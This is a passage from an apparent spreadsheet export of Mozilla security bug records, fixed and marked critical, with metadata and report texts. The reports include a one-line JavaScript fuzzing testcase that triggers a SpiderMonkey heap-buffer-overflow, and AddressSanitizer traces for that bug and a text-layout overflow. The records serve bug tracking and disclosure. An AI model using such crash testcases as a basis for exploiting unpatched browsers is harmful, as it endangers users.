      <c r="Q4739" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4739" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4739" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T4739" t="n">
        <v>1</v>
      </c>
      <c r="U4739" t="n">
        <v>0</v>
      </c>
      <c r="V4739" t="n">
        <v>41</v>
      </c>
      <c r="W4739" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 727d765a5ed8 (build with --enable-gczeal --enable-optimize="-O2 -g" --enable-address-sanitizer --enable-posix-nspr-emulation --disable-jemalloc --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2 --ion-eager --ion-offthread-compile=off):
evalInWorker('if (test("foo\u00ff\u1200").foooo) let x = 42;');
Backtrace:
==26395==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200002f576 at pc 0x168fbfe bp 0x7f82a8ea60d0 sp 0x7f82a8ea60c8
READ of size 1 at 0x61200002f576 thread T7
    #0 0x168fbfd in js::PrintError(JSContext*, _IO_FILE*, char const*, JSErrorReport*, bool) js/src/jscntxt.cpp:537
    #1 0x4dbfae in js::shell::my_ErrorReporter(JSContext*, char const*, JSErrorReport*) js/src/shell/js.cpp:5199
    #2 0x16865bf in js::CallErrorReporter(JSContext*, char const*, JSErrorReport*) js/src/jscntxt.cpp:824
    #3 0x16865bf in js::ReportUncaughtException(JSContext*) js/src/jsexn.cpp:661
    #4 0x16718a1 in ~Rooted js/src/jsapi.cpp:3800
    #5 0x16718a1 in Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, SyntacticScopeOption, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4053
    #6 0x1671dbc in Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, SyntacticScopeOption, char16_t const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4060
    #7 0x1671dbc in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4119
    #8 0x4feb08 in WorkerMain(void*) js/src/shell/js.cpp:2574
    #9 0xb02638 in nspr::Thread::ThreadRoutine(void*) js/src/vm/PosixNSPR.cpp:45
    #10 0x7f82afda7181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #11 0x7f82aec8f47c (/lib/x86_64-linux-gnu/libc.so.6+0xfa47c)
0x61200002f576 is located 0 bytes to the right of 310-byte region [0x61200002f440,0x61200002f576)
allocated by thread T7 here:
    #0 0x4af9d7 in __interceptor_malloc /srv/repos/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x507e7b in js_malloc(unsigned long) js/src/opt64asan/js/src/../../dist/include/js/Utility.h:229
    #2 0x507e7b in _ZL13js_pod_mallocIhEPT_m js/src/opt64asan/js/src/../../dist/include/js/Utility.h:384
    #3 0x507e7b in unsigned char* js::MallocProvider&lt;js::ExclusiveContext&gt;::maybe_pod_malloc&lt;unsigned char&gt;(unsigned long) js/src/vm/MallocProvider.h:56
    #4 0x507e7b in unsigned char* js::MallocProvider&lt;js::ExclusiveContext&gt;::pod_malloc&lt;unsigned char&gt;(unsigned long) js/src/vm/MallocProvider.h:90
    #5 0x16b1694 in js::CopyErrorReport(JSContext*, JSErrorReport*) js/src/jsexn.cpp:188
    #6 0x16b4dc5 in js::ErrorToException(JSContext*, char const*, JSErrorReport*, JSErrorFormatString const* (*)(void*, unsigned int), void*) js/src/jsexn.cpp:575
    #7 0x898e0a in js::frontend::CompileError::throwError(JSContext*) js/src/frontend/TokenStream.cpp:583
    #8 0x898e0a in js::frontend::TokenStream::reportCompileErrorNumberVA(unsigned int, unsigned int, unsigned int, __va_list_tag*) js/src/frontend/TokenStream.cpp:712
    #9 0x57867a in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::reportHelper(js::frontend::ParseReportKind, bool, unsigned int, unsigned int, __va_list_tag*) js/src/frontend/Parser.cpp:479
    #10 0x57867a in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::reportWithOffset(js::frontend::ParseReportKind, bool, unsigned int, unsigned int, ...) js/src/frontend/Parser.h:526
    #11 0x571137 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::checkAndPrepareLexical(bool, js::frontend::TokenPos const&amp;) js/src/frontend/Parser.cpp:4342
    #12 0x551ebc in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::lexicalDeclaration(js::frontend::YieldHandling, bool) js/src/frontend/Parser.cpp:4447
    #13 0x551cf9 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::letDeclarationOrBlock(js::frontend::YieldHandling) js/src/frontend/Parser.cpp:4506
    #14 0x583385 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::statement(js::frontend::YieldHandling, bool) js/src/frontend/Parser.cpp:6837
    #15 0x5885a0 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::ifStatement(js::frontend::YieldHandling) js/src/frontend/Parser.cpp:5074
    #16 0x582ca6 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::statement(js::frontend::YieldHandling, bool) js/src/frontend/Parser.cpp:6766
    #17 0x87b53e in BytecodeCompiler::compileScript(JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;) js/src/frontend/BytecodeCompiler.cpp:589
    #18 0x881008 in js::frontend::CompileScript(js::ExclusiveContext*, js::LifoAlloc*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::ScopeObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JSString*, js::SourceCompressionTask*, js::ScriptSourceObject**) js/src/frontend/BytecodeCompiler.cpp:808
    #19 0x1671739 in Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, SyntacticScopeOption, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4050
    #20 0x1671dbc in Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, SyntacticScopeOption, char16_t const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4060
    #21 0x1671dbc in JS::Compile(JSContext*, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, JS::MutableHandle&lt;JSScript*&gt;) js/src/jsapi.cpp:4119
    #22 0x4feb08 in WorkerMain(void*) js/src/shell/js.cpp:2574
    #23 0xb02638 in nspr::Thread::ThreadRoutine(void*) js/src/vm/PosixNSPR.cpp:45
    #24 0x7f82afda7181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T7 created by T0 here:
    #0 0x4738b6 in __interceptor_pthread_create /srv/repos/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0xa64fe6 in PR_CreateThread(PRThreadType, void (*)(void*), void*, PRThreadPriority, PRThreadScope, PRThreadState, unsigned int) js/src/vm/PosixNSPR.cpp:108
    #2 0x4f23dd in EvalInWorker(JSContext*, unsigned int, JS::Value*) js/src/shell/js.cpp:2618
    #3 0xa9fe58 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:235
    #4 0xa9fe58 in js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) js/src/vm/Interpreter.cpp:756
    #5 0xaa1f3d in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:823
    #6 0xf8bcb3 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/BaselineIC.cpp:8905
SUMMARY: AddressSanitizer: heap-buffer-overflow js/src/jscntxt.cpp:537 js::PrintError(JSContext*, _IO_FILE*, char const*, JSErrorReport*, bool)
Shadow bytes around the buggy address:
  0x0c247fffde50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffde60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffde70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffde80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffde90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c247fffdea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[06]fa
  0x0c247fffdeb0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffdec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffded0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06
  0x0c247fffdee0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffdef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26395==ABORTING
Filing s-s because JS developers could not agree on something else within 10 seconds :D</t>
        </is>
      </c>
      <c r="X4739" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4740">
      <c r="A4740" t="n">
        <v>493649</v>
      </c>
      <c r="B4740" t="inlineStr">
        <is>
          <t>2009-05-18 16:06:31 -0700</t>
        </is>
      </c>
      <c r="C4740" t="inlineStr">
        <is>
          <t>Crash [@ nsPropertyTable::PropertyList::Equals]</t>
        </is>
      </c>
      <c r="D4740" t="inlineStr">
        <is>
          <t>2013-05-19 17:48:58 -0700</t>
        </is>
      </c>
      <c r="E4740" t="n">
        <v>1</v>
      </c>
      <c r="F4740" t="n">
        <v>1</v>
      </c>
      <c r="G4740" t="n">
        <v>3</v>
      </c>
      <c r="H4740" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4740" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4740" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4740" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4740" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4740" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4740" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4740" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4740" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4740" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4740" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4740" t="n">
        <v>1</v>
      </c>
      <c r="U4740" t="n">
        <v>0</v>
      </c>
      <c r="V4740" t="n">
        <v>27</v>
      </c>
      <c r="W4740" t="inlineStr">
        <is>
          <t>Created attachment 378166
testcase
Loading the testcase:
###!!! ASSERTION: reflow roots should never split: 'status == NS_FRAME_COMPLETE', file /Users/jruderman/central/layout/base/nsPresShell.cpp, line 7113
Closing window or quitting Firefox:
Crash [@ nsPropertyTable::PropertyList::Equals] usually touching 0xddddde09.</t>
        </is>
      </c>
      <c r="X4740" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4741">
      <c r="A4741" t="n">
        <v>785555</v>
      </c>
      <c r="B4741" t="inlineStr">
        <is>
          <t>2012-08-24 16:49:52 -0700</t>
        </is>
      </c>
      <c r="C4741" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in gfxTextRun::ShrinkToLigatureBoundaries</t>
        </is>
      </c>
      <c r="D4741" t="inlineStr">
        <is>
          <t>2014-07-18 17:57:12 -0700</t>
        </is>
      </c>
      <c r="E4741" t="n">
        <v>1</v>
      </c>
      <c r="F4741" t="n">
        <v>1</v>
      </c>
      <c r="G4741" t="n">
        <v>3</v>
      </c>
      <c r="H4741" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4741" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4741" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K4741" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4741" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4741" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4741" t="inlineStr">
        <is>
          <t>[asan][adv-main18+]</t>
        </is>
      </c>
      <c r="Q4741" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4741" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4741" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4741" t="n">
        <v>1</v>
      </c>
      <c r="U4741" t="n">
        <v>0</v>
      </c>
      <c r="V4741" t="n">
        <v>37</v>
      </c>
      <c r="W4741" t="inlineStr">
        <is>
          <t>Created attachment 655224
Testcase
Reproduces on trunk
=================================================================
==12169== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f45e076bf00 at pc 0x7f45ff1828e9 bp 0x7fff4b935330 sp 0x7fff4b935328
READ of size 4 at 0x7f45e076bf00 thread T0
    #0 0x7f45ff1828e8 in gfxShapedWord::CompressedGlyph::IsLigatureGroupStart() const src/../../dist/include/gfxFont.h:1897
    #1 0x7f460a041636 in gfxTextRun::ShrinkToLigatureBoundaries(unsigned int*, unsigned int*) src/gfx/thebes/gfxFont.cpp:4555
    #2 0x7f460a04d863 in gfxTextRun::BreakAndMeasureText(unsigned int, unsigned int, bool, double, gfxTextRun::PropertyProvider*, bool, double*, gfxFont::RunMetrics*, gfxFont::BoundingBoxType, gfxContext*, bool*, unsigned int*, bool, gfxBreakPriority*) src/gfx/thebes/gfxFont.cpp:4946
    #3 0x7f45ff148515 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsTextFrameThebes.cpp:7785
    #4 0x7f45fef550cd in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:829
    #5 0x7f45fef25f3b in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
    #6 0x7f45fef22b75 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
    #7 0x7f45fef1fbdf in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:397
    #8 0x7f45fef54c93 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:822
    #9 0x7f45fef25f3b in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
    #10 0x7f45fef22b75 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
    #11 0x7f45fef1fbdf in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:397
    #12 0x7f45fef54c93 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:822
    #13 0x7f45fef25f3b in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
    #14 0x7f45fef22b75 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
    #15 0x7f45fef1fbdf in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:397
    #16 0x7f45fef54c93 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:822
    #17 0x7f45fec12318 in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) src/layout/generic/nsBlockFrame.cpp:3835
    #18 0x7f45fec0c421 in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) src/layout/generic/nsBlockFrame.cpp:3631
    #19 0x7f45febff041 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3483
    #20 0x7f45febedecb in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2571
    #21 0x7f45febd4579 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2021
    #22 0x7f45febc7557 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1070
    #23 0x7f45fec55b20 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:268
    #24 0x7f45febf8cfd in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3207
    #25 0x7f45febed996 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2515
    #26 0x7f45febd4579 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2021
    #27 0x7f45febc7557 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1070
    #28 0x7f45fecb5398 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:946
    #29 0x7f45fee86485 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:463
    #30 0x7f45fecb5398 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:946
    #31 0x7f45fedfcec9 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:523
    #32 0x7f45fee01e9e in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:623
    #33 0x7f45fee0630a in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:864
    #34 0x7f45fecb5398 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:946
    #35 0x7f45ff1deb8d in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:200
    #36 0x7f45fe9439fc in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7430
    #37 0x7f45fe97036b in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7577
    #38 0x7f45fe96ebf1 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3898
    #39 0x7f45fea109f1 in nsRefreshDriver::Notify(nsITimer*) src/layout/base/nsRefreshDriver.cpp:398
    #40 0x7f4609a629c6 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:476
    #41 0x7f4609a641b8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #42 0x7f4609a275ae in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #43 0x7f46096c89c7 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #44 0x7f4608605275 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #45 0x7f4609cd4279 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #46 0x7f4609cd40c2 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #47 0x7f4609cd3fa7 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #48 0x7f4607acfa0e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #49 0x7f4606740528 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #50 0x7f45fcf4c350 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3800
    #51 0x7f45fcf525c4 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3877
    #52 0x7f45fcf5568e in XRE_main src/toolkit/xre/nsAppRunner.cpp:3953
    #53 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #54 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #55 0x7f4619e1ec4d in ?? ??:0
0x7f45e076bf00 is located 4 bytes to the right of 124-byte region [0x7f45e076be80,0x7f45e076befc)
allocated by thread T0 here:
    #0 0x4c3e40 in __interceptor_malloc ??:0
    #1 0x7f4616cbc9d2 in moz_malloc src/memory/mozalloc/mozalloc.cpp:67
    #2 0x7f460a038f43 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) src/gfx/thebes/gfxFont.cpp:4302
    #3 0x7f460a01c06b in gfxTextRun::Create(gfxTextRunFactory::Parameters const*, unsigned int, gfxFontGroup*, unsigned int) src/gfx/thebes/gfxFont.cpp:4319
    #4 0x7f460a01c720 in gfxFontGroup::MakeSpaceTextRun(gfxTextRunFactory::Parameters const*, unsigned int) src/gfx/thebes/gfxFont.cpp:3311
    #5 0x7f460a01f534 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) src/gfx/thebes/gfxFont.cpp:3355
    #6 0x7f45ff0b4128 in gfxTextRun* MakeTextRun&lt;unsigned char&gt;(unsigned char const*, unsigned int, gfxFontGroup*, gfxTextRunFactory::Parameters const*, unsigned int) src/layout/generic/nsTextFrameThebes.cpp:549
    #7 0x7f45ff0a82fa in BuildTextRunsScanner::BuildTextRunForFrames(void*) src/layout/generic/nsTextFrameThebes.cpp:2025
    #8 0x7f45ff09de6b in BuildTextRunsScanner::FlushFrames(bool, bool) src/layout/generic/nsTextFrameThebes.cpp:1388
    #9 0x7f45ff0ada39 in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1578
    #10 0x7f45ff0ae326 in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1618
    #11 0x7f45ff0ae326 in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1618
    #12 0x7f45ff0ae326 in BuildTextRunsScanner::ScanFrame(nsIFrame*) src/layout/generic/nsTextFrameThebes.cpp:1618
    #13 0x7f45ff0c17eb in BuildTextRuns(gfxContext*, nsTextFrame*, nsIFrame*, nsLineList_iterator const*, nsTextFrame::TextRunType) src/layout/generic/nsTextFrameThebes.cpp:1291
    #14 0x7f45ff0bd322 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) src/layout/generic/nsTextFrameThebes.cpp:2441
    #15 0x7f45ff146c51 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, bool, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsTextFrameThebes.cpp:7705
    #16 0x7f45fef550cd in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:829
    #17 0x7f45fef25f3b in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
    #18 0x7f45fef22b75 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
    #19 0x7f45fef1fbdf in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:397
    #20 0x7f45fef54c93 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:822
    #21 0x7f45fef25f3b in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:680
    #22 0x7f45fef22b75 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:543
    #23 0x7f45fef1fbdf in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsInlineFrame.cpp:397
    #24 0x7f45fef54c94 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) src/layout/generic/nsLineLayout.cpp:822
Shadow byte and word:
  0x1fe8bc0ed7e0: fa
  0x1fe8bc0ed7e0: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x1fe8bc0ed7c0: fa fa fa fa fa fa fa fa
  0x1fe8bc0ed7c8: fa fa fa fa fa fa fa fa
  0x1fe8bc0ed7d0: 00 00 00 00 00 00 00 00
  0x1fe8bc0ed7d8: 00 00 00 00 00 00 00 04
=&gt;0x1fe8bc0ed7e0: fa fa fa fa fa fa fa fa
  0x1fe8bc0ed7e8: fa fa fa fa fa fa fa fa
  0x1fe8bc0ed7f0: 00 00 03 fb fb fb fb fb
  0x1fe8bc0ed7f8: fb fb fb fb fb fb fb fb
  0x1fe8bc0ed800: fa fa fa fa fa fa fa fa
Stats: 225M malloced (237M for red zones) by 356222 calls
Stats: 41M realloced by 20031 calls
Stats: 195M freed by 233151 calls
Stats: 61M really freed by 153616 calls
Stats: 428M (109644 full pages) mmaped in 107 calls
  mmaps   by size class: 8:245745; 9:40955; 10:16380; 11:14329; 12:2048; 13:1536; 14:1280; 15:256; 16:448; 17:1248; 18:144; 19:40; 20:16;
  mallocs by size class: 8:270186; 9:45811; 10:15863; 11:16411; 12:2410; 13:1791; 14:1427; 15:303; 16:504; 17:1289; 18:170; 19:41; 20:16;
  frees   by size class: 8:163811; 9:36853; 10:12738; 11:13321; 12:1546; 13:1490; 14:1240; 15:259; 16:449; 17:1277; 18:115; 19:39; 20:13;
